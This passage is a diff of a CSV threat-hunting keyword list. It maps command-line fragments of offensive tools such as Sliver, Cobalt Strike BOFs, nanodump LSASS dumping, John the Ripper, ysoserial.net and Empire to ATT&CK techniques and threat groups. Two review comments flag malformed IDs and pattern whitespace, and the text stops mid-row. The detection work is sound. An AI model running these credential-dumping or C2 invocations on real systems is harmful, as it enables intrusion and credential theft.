CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* forgeTGT(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* --fork --write *.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"* --format exe * --jitter *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"* --format kirbi*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --format exe * --jitter *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* --format kirbi*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "* -format=bof *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=bof -cleanup *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=dotnet -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=dotnet-pinvoke *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* --format=krb5asrep* --wordlist=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --format=netntlmv2 *.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --format=NT -w=*_password.txt*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --format=krb5asrep* --wordlist=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - 
T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --format=netntlmv2 *.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --format=NT -w=*_password.txt*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* -format=reflective-dll *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=service-dll *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=service-exe *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" 
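Review bot: The refreshed sliver row (`"* --format exe * --jitter *"`) still carries technique IDs written with a hyphen (`T1573-001`, `T1059-001`, `T1574-001`, `T1569-002`), while every other row in this hunk uses the ATT&CK dot form (`T1573.001`). Any consumer that joins `metadata_tool_techniques` against ATT&CK, or splits on ` - ` and validates the IDs, will drop or mis-map these entries. As far as I know T1573 defines only the `.001` and `.002` sub-techniques, so `T1573-003` through `T1573-005` look invalid and should be checked rather than just reformatted. Since the row is being rewritten anyway, I would normalise it in the same commit, e.g. `"T1573.001 - T1573.002 - T1059.001 - T1059.003 - T1059.004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574.001 - T1569.002"`.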
@@ -672,10 +672,10 @@ "* ftp-vsftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-vuln-cve2010-4221.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* FudgeC2 *","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"* -FullPrivs * ","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -FullPrivs * ","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o syscalls_mem*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" -"* fuzz -u * -p *--target*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"* FUZZ:FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* fuzz -u * -p *--target*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* FUZZ:FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* --fuzzers addition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "* --fuzzers bitsquatting*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "* --fuzzers cyrillic*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" 
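Review bot: The rewritten Empire row keeps three data-quality problems that affect matching and enrichment. The keyword `"* -FullPrivs * "` ends with a space after the final wildcard; depending on how the pattern is anchored, that may require a trailing space in the command line and miss real invocations, so `"* -FullPrivs *"` looks like the intended value. `metadata_groups_name` ends with a dangling separator (`... - Turla - `), which yields an empty group when the field is split on ` - `. `T1106` also appears twice in the technique list. I would trim all three while the row is being touched.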
@@ -689,43 +689,43 @@ "* --fuzzers subdomain*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "* --fuzzers transposition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "* --fuzzers vowel-swap*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" -"* -g ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -g ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -g -n --kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -g PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -g TextFormattingRunProperties *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* --gadget ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* --gadget ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* --gadget PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g -n --kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a 
